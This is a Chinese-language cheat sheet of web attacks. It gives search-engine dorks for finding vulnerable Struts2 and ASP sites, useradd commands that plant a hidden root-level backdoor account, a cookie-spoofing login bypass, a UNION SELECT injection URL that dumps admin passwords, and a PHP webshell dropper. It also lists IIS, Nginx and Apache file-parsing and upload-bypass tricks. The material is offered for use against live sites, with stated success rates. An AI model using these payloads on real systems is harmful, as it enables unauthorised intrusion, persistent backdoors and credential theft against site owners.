收集整理的各種web漏洞
struts2:
Inurl:index.action
Inurl:商城.action
Inurl:index.action 標題:apache struts2
Inurl:action?id=
site:.com inurl:index.action
inurl:dhis-web-commons
利用工具操作,賬號密碼添加:
useradd -u 0 -o -g root -G root -d /home/bingdao bingdao -p $1$jWIKT776$A8S37J9KR3Z4dpbJVX3rW0
賬號:bingdao
密碼:1
生成加密密碼詳情:
以下爲生成加密密碼命令(第一個1就是密碼):
echo "1" | openssl passwd -1 -salt $(< /dev/urandom tr -dc '[:alnum:]' | head -c 32) -stdin
生成的加密密碼:$1$Rfst5gRR$dqbE2NR0npnFMyeLchbk0/
然後添加權限爲root的賬號和上面的密碼:
useradd -u 0 -o -g root -G root -d /home/lengyu lengyu -p'$1$Rfst5gRR$dqbE2NR0npnFMyeLchbk0/'
就得到了賬號爲“lengyu”,密碼爲“1”的用戶,然後再ssh上去
------------------------------------------------------
szwyadmin cookies欺騙:
inurl:szwyadmin/login.asp
inurl:szwyadmin
代碼:
javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));javascript:alert(document.cookie="admindj="+escape("1"));
代碼複製然後回車。。~ 方便快捷。。然後關閉網頁重新打開後臺地址,然後在地址欄中將login.asp改爲admin_index.asp 就直接進入後臺了,這種方法成功率百分之80以上。
另外這套程序還有一個爆密碼的oday。
使用方法很簡單。直接填寫域名然後點擊爆密碼。~~~ 直接射出管理員帳號密碼。成功率不是很理想畢竟是很多的漏洞了.
-------------------------------------------------------------------------------------------------------------------------
南方數據:
inurl:HrDemand.asp
/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='
admin/southidceditor/admin_style.asp
--------------------------------------------
爆庫:
inurl:conn.asp
----------------
iis6 解析漏洞:
目錄解析 /xx.asp/xx.jpg
說明:在網站下建立文件夾的名字爲 .asp 或 .asa 的文件夾,其目錄內的任何擴展名的文件都被IIS當作asp文件來解析並執行。
文件解析 1.asp;.jpg
說明:會被服務器看成是1.asp還有IIS6.0 默認的可執行文件除了asp還包含這三種
/1.asa
/1.cer
/1.cdx
-----------------------------------
iis7.0/iis7.5/ nginx<8.03 畸形解析漏洞:
Nginx解析漏洞這個偉大的漏洞是我國安全組織80sec發現的…
在默認Fast-CGI開啓狀況下,黑闊上傳一個名字爲1.jpg,內容爲
<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
的文件,然後訪問1.jpg/.php,在這個目錄下就會生成一句話*** shell.php
------------------------------------------------------------------
Nginx <8.03 空字節代碼執行漏洞:
影響版:0.5.,0.6., 0.7 <= 0.7.65, 0.8 <= 0.8.37
Nginx在圖片中嵌入PHP代碼然後通過訪問
xxx.jpg%00.php
來執行其中的代碼
----------------
Apache 解析漏洞
Apache 是從右到左開始判斷解析,如果爲不可識別解析,就再往左判斷.
比如 wooyun.php.owf.rar “.owf”和”.rar” 這兩種後綴是apache不可識別解析,apache就會把wooyun.php.owf.rar解析成php.
如何判斷是不是合法的後綴就是這個漏洞的利用關鍵,測試時可以嘗試上傳一個wooyun.php.rara.jpg.png…(把你知道的常見後綴都寫上…)去測試是否是合法後綴
---------------------------------------------------
在windows環境下,xx.jpg[空格] 或xx.jpg. 這兩類文件都是不允許存在的,若這樣命名,windows會默認除去空格或點,***可以通過抓包,在文件名後加一個空格或者點繞過黑名單.若上傳成功,空格和點都會被windows自動消除,這樣也可以getshell。
如果在Apache中.htaccess可被執行.且可被上傳.那可以嘗試在.htaccess中寫入:
<FilesMatch "1.jpg"> SetHandler application/x-httpd-php </FilesMatch>
然後再上傳shell.jpg的***, 這樣shell.jpg就可解析爲php文件